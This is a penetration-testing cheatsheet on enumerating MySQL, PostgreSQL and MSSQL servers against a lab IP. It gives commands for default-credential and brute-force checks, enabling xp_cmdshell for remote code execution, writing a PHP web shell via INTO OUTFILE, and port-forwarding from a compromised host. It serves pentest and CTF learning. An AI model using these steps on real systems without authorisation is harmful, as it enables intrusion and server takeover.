Skip to content

Database Enumeration

This cheatsheet covers the initial enumeration, default credential testing, and direct interaction with standard relational database management systems (RDBMS) exposed on the network.

MySQL / MariaDB (Port 3306)

MySQL enumeration focuses on extracting server information, identifying empty passwords, and finding unauthorized access vectors.

run safe checks for server info, empty passwords, and basic enumeration 

nmap -p 3306 --script mysql-info,mysql-empty-password,mysql-enum 10.10.10.10

attempt to login as root without a password

mysql -h 10.10.10.10 -u root
login with a known password

mysql -h 10.10.10.10 -u username -p

Important

If you gain access to a MySQL database as the root user, immediately check if the secure_file_priv variable is empty. If it is, you have arbitrary read/write access to the host file system and can potentially execute code via SELECT ... INTO OUTFILE '/var/www/html/shell.php';.

PostgreSQL (Port 5432)

PostgreSQL is heavily used in enterprise environments. It often requires specific roles and authentication methods (like md5 or scram-sha-256), but misconfigurations can allow direct network access.

basic brute-forcing for default postgres accounts 

nmap -p 5432 --script pgsql-brute 10.10.10.10

attempt to connect as the default 'postgres' user 

psql -h 10.10.10.10 -U postgres

connect to a specific database

psql -h 10.10.10.10 -U username -d database_name

Efficiency

In real-world scenarios and CTFs, databases are frequently bound strictly to 127.0.0.1 (localhost) to prevent external attacks. If you compromise a web server but Nmap didn't show port 3306/5432 externally, check netstat -tulpn on the compromised host. You will likely need to set up a local port forward (e.g., ssh -L 3306:127.0.0.1:3306 user@target) to run Nmap or standard database clients against it from your attacking machine.

MSSQL (Port 1433)

Microsoft SQL Server is the backbone of Windows/Active Directory environments. It is tightly integrated with Windows authentication.

gather system info, ping the server, and check for blank sa (System Administrator) passwords 

nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-ntlm-info 10.10.10.10

check for authentication and attempt to enable xp_cmdshell for RCE 

nxc mssql 10.10.10.10 -u 'sa' -p 'password' -M xp_cmdshell

Rabbit Hole

Unlike MySQL, MSSQL relies heavily on the xp_cmdshell extended stored procedure for OS-level command execution. If you get sa credentials but cannot execute commands, xp_cmdshell is likely disabled. You must manually re-enable it via SQL queries (EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;) before attempting to catch a reverse shell.